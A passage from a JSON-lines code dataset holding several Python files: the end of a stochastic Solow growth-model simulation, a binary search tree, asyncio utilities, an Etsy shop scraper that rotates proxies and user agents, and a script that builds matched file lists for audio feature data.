len(data) > 1:\n                logs.append(self.loglin())\n            \n            self.update()\n        \n        if log == True:\n            return data[:-1], logs\n        else:\n            return data[:-1]\n    \n\n\n# In[80]:\n\n\n# Example 1 - Stochastic model\n\nsize = 120\nfig, ax = plt.subplots()\nlines = ['-', '--', '-.']\nmedia = [0] * size\n\nfor i in range(3):\n    model = Solow(depreciation=0.1, savings=0.2, theta=0.36, labourGrowth=0.02, capital=2.27,\n                  stochasticProcess = lambda : math.exp(np.random.normal(0,0.2)))\n    \n    data = model.ts(size)\n    for j in range(size):\n        media[j] += data[j] / 3\n    \n    ax.plot(data, lines[i], alpha=0.9, c='black', lw=0.8)\n\nax.set_xlabel('Time')\nax.set_ylabel('Capital per worker')\nax.set_title('Figure 1: Three simulations of the Solow model')\nplt.show()\n\n\n# In[90]:\n\n\n# Example 2 - Log-linear approximation\n\nmodel = Solow(depreciation=0.1, savings=0.2, theta=0.36, labourGrowth=0.02, capital=2.27,\n              stochasticProcess = lambda : math.exp(np.random.normal(0,0.2)))\n\nsize = 120\ndata, logs = model.ts(size, log=True)\n\nfig, ax = plt.subplots()\nax.plot(data, '-', c='k', lw=0.8, label='Exact')\nax.plot(logs, '--', c='k', lw=0.8, label='log-linear')\n\nax.legend()\n\nax.set_xlabel('Time')\nax.set_ylabel('Capital per worker')\nax.set_title('Figure 2: Simulation of the exact and log-linear Solow model')\n\nplt.show()\n\n","sub_path":"Solow.py","file_name":"Solow.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"243070987","text":"#! 
/usr/bin/python3.6\n#-*- coding:utf-8 -*-\n\nclass TreeNode(object):\n    def __init__(self, val):\n        self.val = val\n        self.left = None\n        self.right = None\n\nclass Utils(object):\n    def inorder_traverse(self, root):\n        \"\"\"\n        In-order traversal: prints node values in ascending order.\n        :param root:\n        :return:\n        \"\"\"\n        def dfs(r):\n            if r:\n                dfs(r.left)\n                print(r.val, end=' ')\n                dfs(r.right)\n        dfs(root)\n        print()\n\nclass BinarySearchTree(object):\n    def __init__(self):\n        self.root = None\n\n    def insert(self, val):\n        if self.root is None:\n            self.root = TreeNode(val)\n            return\n\n        def dfs(root):\n            if root.val > val:\n                if root.left is None:\n                    root.left = TreeNode(val)\n                    return\n                dfs(root.left)\n            elif root.val < val:\n                if root.right is None:\n                    root.right = TreeNode(val)\n                    return\n                dfs(root.right)\n        dfs(self.root)\n\n    def get_max_val_node_of_bst(self, root, parent):\n        if root:\n            if root.right:\n                return self.get_max_val_node_of_bst(root.right, root)\n            return root, parent\n        return None, parent\n\n    def get_node_and_its_parent(self, val, root, parent):\n        if root:\n            if root.val == val:\n                return [root, parent]\n            if root.val > val:\n                return self.get_node_and_its_parent(val, root.left, root)\n            return self.get_node_and_its_parent(val, root.right, root)\n        return None, None\n\n\n\n    def remove(self, val, root):\n        if not root:\n            return None\n        if root.val > val:\n            root.left = self.remove(val, root.left)\n        elif root.val < val:\n            root.right = self.remove(val, root.right)\n        else:\n            if root.left is None:\n                return root.right\n            if root.right is None:\n                return root.left\n            left = root.left\n            while left.right:\n                left = left.right\n            # Replace the removed value with its in-order predecessor's value.\n            root.val = left.val\n            root.left = self.remove(root.val, root.left)\n        return root\n\n\n\n\n\n\ndef main():\n    tree = BinarySearchTree()\n    for num in [7,4,9,2,6,8,10,1,3,5]:\n        tree.insert(num)\n    util = Utils()\n    util.inorder_traverse(tree.root)\n    # tree.remove(4)\n    # tree.remove(7)\n    # tree.remove(3)\n    tree.remove(1, tree.root)\n    util.inorder_traverse(tree.root)\n\n\nif __name__ == \"__main__\":\n    main()","sub_path":"python/trees/binary_search_tree/bst_tree.py","file_name":"bst_tree.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"473118711","text":"import asyncio\nimport inspect\nimport logging\n\n__all__ = [\"read_file_ignore_errors\", \"start_timer\"]\n\nlog = logging.getLogger(\"utils\")\n\ndef read_file_ignore_errors(path):\n    try:\n        with open(path, \"r\") as f:\n            return f.read().strip()\n    except:\n        return None\n\ndef raise_event(handler, *args):\n    try:\n        res = handler(*args)\n\n        if inspect.isawaitable(res):\n            asyncio.ensure_future(res)\n    except Exception as e:\n        log.error(\"Exception in event handler\", exc_info=e)\n\ndef run_event_loop(debug=False):\n    loop = asyncio.get_event_loop()\n\n    if debug:\n        loop.set_debug(True)\n\n        import warnings\n        warnings.simplefilter(\"always\", ResourceWarning)\n\n    try:\n        loop.run_forever()\n    except KeyboardInterrupt:\n        print(\"\\nTrying to shut down gracefully... 
(Ctrl-C to force)\")\n\n        for task in asyncio.Task.all_tasks():\n            task.cancel()\n\n        async def _stop():\n            loop.stop()\n\n        loop.run_until_complete(_stop())\n    finally:\n        loop.close()\n\ndef start_timer(func, interval):\n    async def timer_coro():\n        while True:\n            try:\n                res = func()\n\n                if inspect.isawaitable(res):\n                    await res\n            except Exception as e:\n                log.error(\"Exception in timer function\", exc_info=e)\n\n            await asyncio.sleep(interval)\n\n    asyncio.ensure_future(timer_coro())\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"293139502","text":"import requests\nfrom predictTags import PredictTags\nfrom bs4 import BeautifulSoup\nfrom random import choice\nfrom multiprocessing import Pool\n\nclass TopSeller:\n\tdef __init__(self, url):\n\t\tself.url = url \n\t\tself.worker()\n\n\tdef worker(self):\n\t\tuser_agent = GetUA()\n\t\tproxy = GetProxy()\n\t\t# Pass the user agent as a request header (not as query params).\n\t\thtml = requests.get(self.url, headers={'User-Agent': user_agent}, proxies=proxy)\n\t\tif html.status_code == 200:\n\t\t\tsoup = BeautifulSoup(html.text, 'lxml')\n\t\t\ttables = soup.find_all('table', class_='table')\n\t\t\ttable = tables[1].find('tbody')\n\t\t\ttmp_lst = table.text.replace('\\n\\n', '').split()\n\t\t\tlst_shops = [tmp_lst[i] for i in range(1, min(300, len(tmp_lst)), 3)]\n\t\t\tif len(lst_shops) > 2:\n\t\t\t\tfor shop in lst_shops:\n\t\t\t\t\tif shop in ['CaitlynMinimalist', 'eugenie2', 'LouMarksPhoto',\n\t\t\t\t\t'PlannerKate1', 'Beadboat1', 'MignonandMignon', 'SoGoodSoWood',\n\t\t\t\t\t'PeggySueAlso', 'AimVogue', 'AvEwerkz'\n\t\t\t\t\t]:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tprint(shop)\n\t\t\t\t\thref = f\"https://www.etsy.com/shop/{shop}\"\n\t\t\t\t\thtml_shop = requests.get(href)\n\t\t\t\t\tsoup_shop = BeautifulSoup(html_shop.text, 'lxml')\n\t\t\t\t\tul = soup_shop.find('ul', class_='listing-cards').find_all('li')\n\t\t\t\t\tlst_items = [ul[i].find('a')['href'] for i in range(len(ul))]\n\t\t\t\t\t\n\t\t\t\t\tp = Pool(15) # Pool tells how many at a time\n\t\t\t\t\trecords = p.map(PredictTags, lst_items)\n\t\t\t\t\tp.terminate()\n\t\t\t\t\tp.join()\n\n\t\t\t\t\t# for item in lst_items:\n\t\t\t\t\t\t#PredictTags(item)\n\t\t\t\t\t\t# print(\"shop done: ==> \", shop)\n\t\t\t\t\t\t# print()\n\t\t\t\t\tprint('======================^.^======================^.^=~=========================')\n\t\t\t\n\t\t\t\nclass GetUA:\n\tdef __new__(self):\n\t\ttry:\n\t\t\twith open('ua.txt') as f:\n\t\t\t\ttmp = f.read().split('\\n')\n\t\t\treturn choice(tmp)\n\t\texcept:\n\t\t\treturn None\n\nclass GetProxy:\n\tdef __new__(self):\n\t\thtml = requests.get('https://www.us-proxy.org/')\n\t\tsoup = BeautifulSoup(html.text, 'lxml')\n\t\ttrs = soup.find('table', id='proxylisttable').find('tbody').find_all('tr')\n\t\tlst = [f\"{t.text}\" for tr in trs for t in tr]\n\t\t# Each table row contributes 8 cells: IP at index i, port at i+1.\n\t\tproxies = [f\"{lst[i]}:{lst[i+1]}\" for i in range(0, len(lst) - 1, 8)]\n\t\twhile True:\n\t\t\tproxy = {\"http\": f\"http://{choice(proxies)}\"}\n\t\t\tr = requests.get('https://www.us-proxy.org/', proxies=proxy)\n\t\t\tif r.status_code == 200:\n\t\t\t\treturn proxy\n\nif __name__ == '__main__':\n\tTopSeller('https://erank.com/top-sellers')\n\t\n","sub_path":"forwork/parserShopLists.py","file_name":"parserShopLists.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"146245695","text":"from pathlib import Path\n\nref_dir = 
Path('/Users/dintu/zalo_ai/postfilt_gan/natural_mgc')\ngen_dir = Path('/Users/dintu/zalo_ai/postfilt_gan/synthesized_mgc')\n\n# ref_dir = Path('/Training/tdinh/postfilt_gan/mgc')\n# gen_dir = Path('/Training/tdinh/postfilt_gan/mgc_gen')\n\ngFile = open('gen_files.list', 'w')\nrFile = open('ref_files.list', 'w')\ncount = 0\nfor file in gen_dir.glob('*.mgc'):\n    ref_path = ref_dir.joinpath(file.name)\n    if ref_path.is_file():\n        gFile.write(f\"{file}\\n\")\n        rFile.write(f\"{ref_path}\\n\")\n        count += 1\n# Close the list files so the writes are flushed to disk.\ngFile.close()\nrFile.close()\nprint(count)","sub_path":"mkList.py","file_name":"mkList.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
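For completeness, a minimal sketch of how the two list files written by mkList.py above could be consumed downstream as aligned (generated, reference) pairs; the file names match the ones above, everything else is illustrative:

from pathlib import Path

# Line i of each list refers to the same utterance, so a plain zip pairs them up.
gen_paths = Path('gen_files.list').read_text().splitlines()
ref_paths = Path('ref_files.list').read_text().splitlines()

assert len(gen_paths) == len(ref_paths), 'the two lists must stay aligned'
for gen, ref in zip(gen_paths, ref_paths):
    print(gen, '<->', ref)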